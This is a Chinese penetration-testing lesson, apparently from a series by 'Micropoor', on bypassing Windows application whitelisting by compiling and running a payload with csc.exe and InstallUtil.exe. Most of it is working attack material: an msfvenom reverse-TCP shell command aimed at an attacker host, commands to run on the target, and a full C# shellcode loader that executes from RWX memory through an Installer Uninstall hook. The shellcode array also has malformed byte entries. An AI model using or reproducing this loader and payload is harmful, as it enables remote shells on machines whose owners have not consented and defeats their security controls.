第七十七课:基于白名单Csc.exe执行payload第七季
注:请多喝点热水或者凉白开,身体特别重要。

Csc.exe简介:

C#在Windows平台下的编译器名称是Csc.exe,如果你的.NET FrameWork SDK安装在C盘,那么你可以在C:\WINNT\Microsoft.NET\Framework\xxxxx目录中发现它。为了使用方便,你可以手动把这个目录添加到Path环境变量中去。用Csc.exe编译HelloWorld.cs非常简单,打开命令提示符,并切换到存放 test.cs 文件的目录中,输入下列命令:csc /target:exe test.cs 将 test.cs 编译成名为 test.exe 的 console 应用程序
说明:Csc.exe 所在路径默认没有被系统添加到 PATH 环境变量中,因此直接输入 csc 命令无法被识别。

基于白名单Csc.exe配置payload:

Windows 7 默认位置:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
攻击机:192.168.1.4 Debian 靶机:192.168.1.5 Windows 7

配置攻击机msf:

配置payload:

msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐ f csharp
copy buf 到 Micropoor_Csc.cs shellcode 中。

靶机执行:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Mic opoor.exe /platform:x64 /unsafe C:\Users\John\Desktop\Micropoor_Csc.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\John\Desktop\Micropoor.exe
与第七十二课相比,payload更为灵活。

附录:Micropoor_Csc.cs

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
// msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐f csharp
public class Program
{
public static void Main()
{
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
Shellcode.Exec();
}
}
public class Shellcode
{
public static void Exec()
{
byte[] shellcode = new byte[510] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,x8b,
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,x41,
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,xe9,
0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,x00,
0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,xe5,
0x49,0xbc,0x02,0x00,0x00,0x35,0xc0,0xa8,0x01,0x04,0x41,0x54,0x49,0x89,xe4,
0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,x68,
0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,x0a,
0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,x89,
0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,xd5,
0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,xba,
0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,xe5,
0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,xc9,
0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,xd5,
0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,x41,
0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,x41,
0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,x31,
0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,xc8,
0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,x40,
0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,xd5,
0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,x3c,
0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,x41,
0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,xd5 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}
Micropoor